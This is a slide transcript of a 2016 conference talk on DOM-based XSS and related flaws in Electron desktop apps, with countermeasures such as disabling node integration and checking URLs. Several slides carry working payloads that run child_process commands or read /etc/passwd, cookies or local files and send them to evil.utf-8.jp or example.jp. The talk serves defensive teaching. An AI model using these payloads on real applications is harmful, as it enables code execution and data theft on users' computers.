Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

[CB16] Electron - Build cross platform desktop XSS, it’s easier than you think by Yosuke Hasegawa

1,281 views

Published on

Electron is a framework to create the desktop application on Windows,OS X, Linux easily, and it has been used to develop the popular applications such as Atom Editor, Visual Studio Code, and Slack.
Although Electron includes Chromium and node.js and allow the web application developers to be able to develop the desktop application with accustomed methods, it contains a lot of security problems such as it allows arbitrary code execution if even one DOM-based XSS exist in the application. In fact, a lot of vulnerabilities which is able to load arbitrary code in applications made with Electron have been detected and reported.
In this talk, I focus on organize and understand the security problems which tend to occur on development using Electron.

--- Yosuke Hasegawa

Secure Sky Technology Inc, Technical Adviser. Known for finding numerous vulnerablities in Internet Explorer、Mozilla Firefox and other web applications.He has also presented at Black Hat Japan 2008, South Korea POC 2008, 2010 and others.
OWASP Kansai Chapter Leader, OWASP Japan Board member.

Published in: Technology
  • Be the first to comment

[CB16] Electron - Build cross platform desktop XSS, it’s easier than you think by Yosuke Hasegawa

  1. 1. Build cross platform desktop XSS It’s easier than you think ELECTRON Secure Sky Technology Inc. Yosuke HASEGAWA
  2. 2. Yosuke HASEGAWA @hasegawayosuke Secure Sky Technology Inc. Technical Advisor OWASP Kansai Chapter Leader OWASP Japan Chapter board member CODE BLUE Review board member http//utf-8.jp/ Author of jjencode, aaencode Talked at Black Hat Japan 2008, KOREA POC 2008, POC 2010, OWASP AppSec APAC 2014 and others. Found many vulns of IE, Firefox and others. Secure Sky Technology Inc. CODE BLUE 2016
  3. 3. Secure Sky Technology Inc. CODE BLUE 2016 What's Electron ? Framework to develop the cross-platform desktop application developed by GitHub Capable of developing applications in HTML+JavaScript Used by many application developpers
  4. 4. Secure Sky Technology Inc. CODE BLUE 2016 What's Electron ? HTML + JavaScript = Native Apps Microsoft HTML Application (*.hta) Firefox OS Apache Cordova / Adobe PhoneGap Chrome Apps Electron / NW.js Electron Cross platform Capable of building binaries
  5. 5. Secure Sky Technology Inc. CODE BLUE 2016 What's Electron ? Contain node.js & Chromium as runtime Main process Overseewholetheapplication.Theverynode.js Renderer process Chromium+node.js main process renderer process Electron Apps IPC
  6. 6. Secure Sky Technology Inc. CODE BLUE 2016 What's Electron ? main process renderer process Electron Apps IPC index.html package.json { "name" : "Apps name", "version" : "0.1", "main" : "main.js" } main.js let win = new BrowserWindow( {width:840,height:700} ); {json} <html> <head>...</head> <body> <script>...</script> </body> </html> win.loadURL( `file://${__dirname}/index.html` );
  7. 7. Secure Sky Technology Inc. CODE BLUE 2016 What's Electron ? In renderer, node.js run in the browser node function can also be disabled. Enabled by default. <html> <script> const fs = require( "fs" ); function foo(){ fs.readFile( "./test.txt", { encoding: "utf-8" }, (err, data) => { document.getElementById("main").textContent = data; } ); } </script> <div id="main"> </div> </html>
  8. 8. Secure Sky Technology Inc. CODE BLUE 2016 Electron Apps Security
  9. 9. Secure Sky Technology Inc. CODE BLUE 2016 Electron Apps Security Three major Problems Security measures as Web application Renderer is a browser. Measures for DOM-based XSS is necessary Security measures as local application Measures for traditional application, such as race condition and improper encryption Security measures specific to Electron Measures for the various function of Electron
  10. 10. Secure Sky Technology Inc. CODE BLUE 2016 Electron Apps Security Three major Problems Security measures as Web application Renderer is a browser. Measures for DOM-based XSS is necessary Security measures as local application Measures for traditional application, such as race condition and improper encryption Security measures specific to Electron Measures for the various function of Electron
  11. 11. Secure Sky Technology Inc. CODE BLUE 2016 Securitymeasuresas Webapplication Renderer process : Chromium + node.js DOM operation tend to increase DOM-based XSS is easy to occur Open redirector(*) by JavaScript (*)open redirector : URL Redirection to Untrusted Site Security measures for the front end similar to the traditional Web application is necessary
  12. 12. Secure Sky Technology Inc. CODE BLUE 2016 Securitymeasuresas Webapplication DOM-based XSS is easy to occur DOM operation is often Originally, DOM-based XSS is hard to find fs.readFile( filename, (err,data) => { if(!err) element.innerHTML = data; //XSS! }); fs.readdir( dirname, (err,files) => { files.forEach( (filename) => { let elm = document.createElement( "div" ); elm.innerHTML = `<a href='${filename}'>${filename}</a>`; //XSS! paerntElm.appendChild( elm ); }); });
  13. 13. Secure Sky Technology Inc. CODE BLUE 2016 Securitymeasuresas Webapplication Fatal damage if DOM-based XSS occurs In many cases node function is also available in the code injected by Attacker Not the only XSS = alert Read and write local file Communicate in any protocol Interference to other application Generate arbitrary process So, it is possible to exec arbitrary code triggered by DOM-based XSS
  14. 14. Secure Sky Technology Inc. CODE BLUE 2016 Securitymeasuresas Webapplication Traditional Web application Showing false information, Leaking Cookie, Leaking the information in the web site ... All that JS can do in “the Web site” Can not do anything beyond the Web site Protected by the browser ... Sandbox Even if there is a vulnerability, no impact on other than its own Web site Damage occurs only to the extent that Web site owner can take responsibility
  15. 15. Secure Sky Technology Inc. CODE BLUE 2016 Securitymeasuresas Webapplication XSS in Electron Exec arbitrary code in the authority of a user using the application All of what the user can do on the PC  Destruction of existing applications  Tampering and sniffing of online banking apps  Infection and delivery of malware Can do anything beyond the scope of the application The responsibility of the developer really changes
  16. 16. Secure Sky Technology Inc. CODE BLUE 2016 Securitymeasuresas Webapplication Against attacks on Electron application JavaScript for the Web site falsification Even if it is obfuscated, finally DOM operation Look for the insertion of <iframe> and <script> JavaScript for attack to Electron Any function process is present as possibility Checkup the behavior in detail is necessary The technique of the analysis side is immature, too
  17. 17. Secure Sky Technology Inc. CODE BLUE 2016 Electron Apps Security Three major Problems Security measures as Web application Renderer is a browser. Measures for DOM-based XSS is necessary Security measures as local application Measures for traditional application, such as race condition and improper encryption Security measures specific to Electron Measures for the various function of Electron
  18. 18. Secure Sky Technology Inc. CODE BLUE 2016 Securitymeasuresas localapplication Securitymeasuresforlocalapplicationisnecessary Symlink attack Race condition Improper use of encryption Too much access right  e.g. Confidential information as 644 Alias notation of file name  e.g. 8.3 filename, ADS(file.txt::$DATA) and many others DifferentknowledgebackgroundfromWebapps Platform-specificknowledgeisalsonecessary
  19. 19. Secure Sky Technology Inc. CODE BLUE 2016 Electron Apps Security Three major Problems Security measures as Web application Renderer is a browser. Measures for DOM-based XSS is necessary Security measures as local application Measures for traditional application, such as race condition and improper encryption Security measures specific to Electron Measures for the various function of Electron
  20. 20. Secure Sky Technology Inc. CODE BLUE 2016 SecuritymeasuresspecifictoElectron Notes on using individual API <webview> tag shell.openExternal Architectural problems of Electron BrowserWindow normally loads "file://" There is no address bar unlike browsers
  21. 21. Secure Sky Technology Inc. CODE BLUE 2016 Deep dive into DbXSS of Electron
  22. 22. Secure Sky Technology Inc. CODE BLUE 2016 DOM-based XSS XSS that occur on JS by giving sources to sinks without escaping source: Character strings attacker gave sink : To generate HTML from character string and to run it as a code source Process sink location.hash location.href location.search document.referrer window.name xhr.responseText postMessage location.href document.write innerHTML eval Function setTimeoutsetInterval
  23. 23. Secure Sky Technology Inc. CODE BLUE 2016 DOM-based XSS Damage in traditional XSS Show of alert Show false information in Web apps Cookie theft Theft of confidential information in Web apps anything else? elm.innerHTML = "<img src=# onerror=alert('xss!')>"; elm.innerHTML = "<form>ログイン:<input type='password'>"; elm.innerHTML = "<img src=# onerror="new Image().src='http://example.jp/?'+document.cookie">"; elm.innerHTML = "<img src=# onerror="new Image().src='http://example.jp/?'+elm.innerHTML">";
  24. 24. Secure Sky Technology Inc. CODE BLUE 2016 DOM-based XSS on Electron apps node function on renderer is enabled by default // xss_source is character string that attacker can control elm.innerHTML = xss_source; // XSS! <img src=# onerror= "require('child_process').exec('calc.exe',null);"> <img src=# onerror=" let s = require('fs').readFileSync('/etc/passwd','utf-8'); fetch( 'http://evil.utf-8.jp/', { method:'POST', body:s }); ">
  25. 25. Secure Sky Technology Inc. CODE BLUE 2016 ” “ DOM-based XSS on Electron apps Arbitrary code exec is possible - Like Buffer Overflow XSS: The New Buffer Overflow In many respects, an XSS vulnerability is just as dangerous as a buffer overflow. 多くの点から見て、XSS 脆弱性の危険性はバッファ オーバーフローに匹敵します。 "Security Briefs: SDL Embraces The Web", Apr. 2008 http://web.archive.org/web/20080914182747/http://msdn.microsoft.com/e n-us/magazine/cc794277.aspx
  26. 26. Secure Sky Technology Inc. CODE BLUE 2016 DOM-based XSS on Electron apps XSS that occur on JS by giving sources to sinks without escaping source: Character strings attacker gave sink : To generate HTML from character string and to run it as a code source Process sink location.hash location.href location.search document.referrer window.name xhr.responseText postMessage location.href document.write innerHTML eval Function setTimeoutsetInterval
  27. 27. Secure Sky Technology Inc. CODE BLUE 2016 DOM-based XSS on Electron apps XSS that occur on JS by giving sources to sinks without escaping source: Character strings attacker gave sink : To generate HTML from character string and to run it as a code source Process sink location.hash location.href location.search document.referrer window.name xhr.responseText postMessage location.href document.write innerHTML eval Function setTimeoutsetInterval user name database file contents file contents file name logs webFrame.executeJavaScript webViewrequire
  28. 28. Secure Sky Technology Inc. CODE BLUE 2016 DOM-based XSS on Electron apps Source that did not exist in the traditional Web apps Every data which are unrelated to HTTP and Web can be XSS source Sink does not increase so much It usually does not give dynamic argument to require and other sinks Not conscious of source, and it is important to escape when hand it to sink Proper DOM operation (e.g. textContent, setAttribute)
  29. 29. Secure Sky Technology Inc. CODE BLUE 2016 Content Security Policy
  30. 30. Secure Sky Technology Inc. CODE BLUE 2016 Content Security Policy Apply CSP to renderer as XSS countermeasure is effective? <head> <meta http-equiv="Content-Security-Policy" content="default-src 'none';script-src 'self'"> </head> <body> <script src="./index.js"></script> </body> renderer //index.js elm.innerHTML = xss_source; // XSS!
  31. 31. Secure Sky Technology Inc. CODE BLUE 2016 Content Security Policy xss_source = '<meta http-equiv="refresh" content="0;http://evil.utf-8.jp/">'; <script> require('child_process').exec('calc.exe',null); </script> http://evil.utf-8.jp/ meta refresh is not limited by CSP Openedinrenderer.nodefunctionisavailableinrenderer. <head> <meta http-equiv="Content-Security-Policy" content="default-src 'none';script-src 'self'"> </head> <body> <script src="./index.js"></script> </body> renderer //index.js elm.innerHTML = xss_source; // XSS!
  32. 32. Secure Sky Technology Inc. CODE BLUE 2016 Content Security Policy Another pattern <head> <meta http-equiv="Content-Security-Policy" content="default-src 'self'"> </head> <body> <iframe id="iframe"></iframe> <script src="./index.js"></script> </body> renderer //index.js iframe.setAttribute("src", xss_source); // XSS?
  33. 33. Secure Sky Technology Inc. CODE BLUE 2016 Content Security Policy Another pattern <head> <meta http-equiv="Content-Security-Policy" content="default-src 'self'"> </head> <body> <iframe id="iframe"></iframe> <script src="./index.js"></script> </body> renderer //index.js iframe.setAttribute("src", xss_source); // XSS! app.on('ready', () => { win = new BrowserWindow({width:600, height:400} ); win.loadURL(`file://${__dirname}/index.html`); .... main.js origin === 'file://'
  34. 34. Secure Sky Technology Inc. CODE BLUE 2016 Content Security Policy <head> <meta http-equiv="Content-Security-Policy" content="default-src 'self'"> </head> <body> <iframe id="iframe"></iframe> <script src="./index.js"></script> </body> renderer //index.js iframe.setAttribute("src", xss_source); // XSS! xss_source = 'file://remote-server/share/trap.html'; window.top.location=`data:text/html, <script>require('child_process').exec('calc.exe',null);</script>`; file://remote-server/share/trap.html Sinceoriginis"file://",attacker'sfileserverisalsosameorigin In top level window, node function is available
  35. 35. Secure Sky Technology Inc. CODE BLUE 2016 Content Security Policy Even after CSP restricted to read resource, page transition is possible by meta refresh  Transition in renderer to trap page prepared by attacker  In the trap page prepared by attacker, of course CSP does not work Because of "file://", attacker's resource is from same origin  Easy to put iframe or script source In renderer, node function is available Conclusion:cannotreducethreatofXSSbyCSP
  36. 36. Secure Sky Technology Inc. CODE BLUE 2016 Disabling node in renderer
  37. 37. Secure Sky Technology Inc. CODE BLUE 2016 Disabling node in renderer Disable node of renderer, threat reduce At the time of creating BrowserWindow, to specify disabled explicitly is necessary. Enabled by default. app.on('ready', () => { win = new BrowserWindow( { webPreferences:{nodeIntegration:false} }); win.loadURL(`file://${__dirname}/index.html`); .... main.js
  38. 38. Secure Sky Technology Inc. CODE BLUE 2016 Disabling node in renderer node function in renderer is enabled by default Unless explicitly disable node, it remains enabled Disabling node in renderer, make Electron apps unpractical Still, is disabling node effective?
  39. 39. Secure Sky Technology Inc. CODE BLUE 2016 Disabling node in renderer HowfarattackspossibleinnodedisabledJS Before then, origin is "file://" With XHR, etc, reading local file is possible app.on('ready', () => { win = new BrowserWindow( { webPreferences:{nodeIntegration:false} }); win.loadURL(`file://${__dirname}/index.html`); .... var xhr = new XMLHttpRequest(); xhr.open( "GET", "file://c:/file.txt", true ); xhr.onload = () => { fetch( "http://example.jp/", { method:"POST",body:xhr.responseText } ); }; xhr.send( null );
  40. 40. Secure Sky Technology Inc. CODE BLUE 2016 Disabling node in renderer Disabling node is possible, by explicitly specifying Disabling node in renderer, make Electron apps unpractical Even after node is disabled, reading local file is possible
  41. 41. Secure Sky Technology Inc. CODE BLUE 2016 iframe sandbox
  42. 42. Secure Sky Technology Inc. CODE BLUE 2016 iframe sandbox To limit the DOM operation access within <iframe sandbox>, as application To operate iframe from outside Even if DbXSS occurs in iframe, the damage is limited <iframe sandbox="allow-same-origin" id="sb" srcdoc="<html><div id=msg'></div>..."></iframe> .... document.querySelector("#sb") .contentDocument.querySelector("#msg").innerHTML = "Hello, XSS!<script>alert(1)</script>"; // not work
  43. 43. Secure Sky Technology Inc. CODE BLUE 2016 DbXSS mitigate - <iframe sandbox> <iframe sandbox[="params"]> Representative allow-forms - Allow form to exec allow-scripts - Allow script to exec allow-same-origin - Allowsameoriginhandling allow-top-navigation - Allowinterferencetotop allow-popups - Allow pop-up To specify allow-scripts is dangerous In iframe, JS work normally allow-top-navigation, allow-popups are dangerous, too
  44. 44. Secure Sky Technology Inc. CODE BLUE 2016 <iframe sandbox="allow-popups"> <iframe sandbox="allow-same-origin allow-popups" id="sb" srcdoc="<html><div id=msg'></div>..."></iframe> ... var xss = `<a target="_blank" href="data:text/html,<script>require('child_process') .exec('calc.exe',null);</script>">Click</a>`; document.querySelector("#sb") .contentDocument.querySelector("#msg").innerHTML = xss; Click (iframe) data:text/html, <script>require(...) ← CE C ± √ 7 8 9 / % 4 5 6 * 1/x 1 2 3 - = 0 . + 0 In BrowserWindow generated by popup, JavaScript work with enabled node function
  45. 45. Secure Sky Technology Inc. CODE BLUE 2016 <webview> tag
  46. 46. Secure Sky Technology Inc. CODE BLUE 2016 <webview> tag Put other sites in renderer Unlike iframe, do not have any access to the outside of webview (e.g. window.top) CannoteasilydoDOMoperationfromoutsideeither (There is no kind of iframe.contentWindow) Enble/disable node function is possible by each of webview Allow generation of new window by allowpopups attribute <webview src="http://example.jp/"></webview> <webview src="http://example.jp/" nodeintegration></webview> <webview src="http://example.jp/" allowpopups></webview>
  47. 47. Secure Sky Technology Inc. CODE BLUE 2016 <webview> tag Newly opened window by window.open(), <a target=_blank>, etc In iframe and webview, enabled or disabled of node is different <webview allow-popups> node disable renderer(nodeenable) <iframe> node always disable renderer(nodeenable) <webview allow-popups nodeintegration> node enable renderer(nodeenable) New renderer (node disable) New renderer (node enable) New renderer (node enable)
  48. 48. Secure Sky Technology Inc. CODE BLUE 2016 <webview> tag Safe to disable node and use preload function In preload script, even if in node disabled webview, node function is available <webview src="http://example.jp/" preload="./prealod.js"> </webview> //preload.js window.loadConfig = function(){ let file = `${__dirname}/config.json`; let s = require("fs").readFileSync( file, "utf-8" ); return JSON.eval( s ); };
  49. 49. Secure Sky Technology Inc. CODE BLUE 2016 <webview> tag Common case Making existing Web app a native app Put existing Web app in <webview> <body> <webview src="http://example.jp/"></webview> <script src="native-apps.js"></script> </body> Code Blue SNS Ads
  50. 50. Secure Sky Technology Inc. CODE BLUE 2016 <webview> tag Common case Making existing Web app a native app Put existing Web app in <webview> <body> <webview src="http://example.jp/"></webview> <script src="native-apps.js"></script> </body> Code Blue SNS Ads webview
  51. 51. Secure Sky Technology Inc. CODE BLUE 2016 <webview> tag Common case Making existing Web app a native app Put existing Web app in <webview> <body> <webview src="http://example.jp/"></webview> <script src="native-apps.js"></script> </body> Code Blue SNS Ads webview webview contain 3rd party advertisement
  52. 52. Secure Sky Technology Inc. CODE BLUE 2016 <webview> tag Inthecaseofwebviewcontaining3rdpartyad Ad JS freely exec code in webview If node is enabled, both ad JS and node function are available in webview Even if node is disabled, such as rewriting the entire screen or show of fake login screen are possible via window.top e.g. malicious advertising, delivery server pollution ... Code Blue SNS User: Pass: // load fake login page window.top = "http://evil.utf-8.jp/";
  53. 53. Secure Sky Technology Inc. CODE BLUE 2016 <webview> tag Countermeasure : Ads are shown in iframe sandbox  Prevent interference to top  Not applicable for JS embedded type ad Web app  DoesnotaffectadtotheWebappbeyondtheorigin  Users can check if the site is valid, with address bar Electron app  Even for ad in iframe, it is possible to exec malicious code if node function is enabled  Users cannot check if the site is valid, without address bar
  54. 54. Secure Sky Technology Inc. CODE BLUE 2016 window.open from <webview> allowpopups attribute In window.open, popup is enabled Inwindow.open,file:schemecanalsobespecified Attackers can read local files by running file:// origin script through file server <webview src="http://example.jp/" allowpopups></webview> // http://example.jp window.open("file://remote-server/share/trap.html"); // file://remote-server/share/trap.html var xhr = new XMLHttpRequest(); xhr.open( "GET", "file://C:/secret.txt", true );
  55. 55. Secure Sky Technology Inc. CODE BLUE 2016 window.open from <webview> Countermeasure Take off allowpopups attribute Or, check the URL in main.js // main.js app.on('browser-window-created', (evt, window) => { window.webContents.on('new-window', (evt,url) => { let protocol = require('url').parse(url).protocol; if (!protocol.match( /^https?:/ )) { evt.defaultPrevented = true; console.log( "invalid url", url ); } }); });
  56. 56. Secure Sky Technology Inc. CODE BLUE 2016 shell.openExternal shell.openItem
  57. 57. Secure Sky Technology Inc. CODE BLUE 2016 shell.openExternal, shell.openItem Start external program correspond to URL or extension const {shell} = require( 'electron' ); const url = 'http://example.jp/'; shell.openExternal( url ); // start OS standard browser shell.openItem( url ); let file = 'C:/Users/hasegawa/test.txt'; shell.openExternal( file ); // file open in OS standard way shell.openItem( file ); let filename = 'file://C:/Users/hasegawa/test.txt'; shell.openExternal( file ); // file open in OS standard way shell.openItem( file );
  58. 58. Secure Sky Technology Inc. CODE BLUE 2016 shell.openExternal, shell.openItem Common case Open such as window.open from webview with OS standard browser If attakers can manipulae URL, they can run any commands  Cannot hand over argument to command webview.on( 'new-window', (e) => { shell.openExternal( e.url ); // Open with OS standard browser }); <a href="file://c:/windows/system32/calc.exe">Click</a>
  59. 59. Secure Sky Technology Inc. CODE BLUE 2016 shell.openExternal, shell.openItem Verification is necessary, not to pass any arbitrary URLs to shell.openExternal, shell.openItem if (url.match( /^https?:/// )) { shell.openExternal( url ); //open in browser }
  60. 60. Secure Sky Technology Inc. CODE BLUE 2016 Conclusion
  61. 61. Secure Sky Technology Inc. CODE BLUE 2016 Conclusion domXss().then( die ); // ACE In the context of enabled node, do to allow external scripts to run In the file: scheme, do not allow external scripts to run Attacker can use the trap file server
  62. 62. Secure Sky Technology Inc. CODE BLUE 2016 Question ? hasegawa@utf-8.jp @hasegawayosuke http://utf-8.jp/ Credits to @harupuxa, @kinugawamasato, nishimunea

×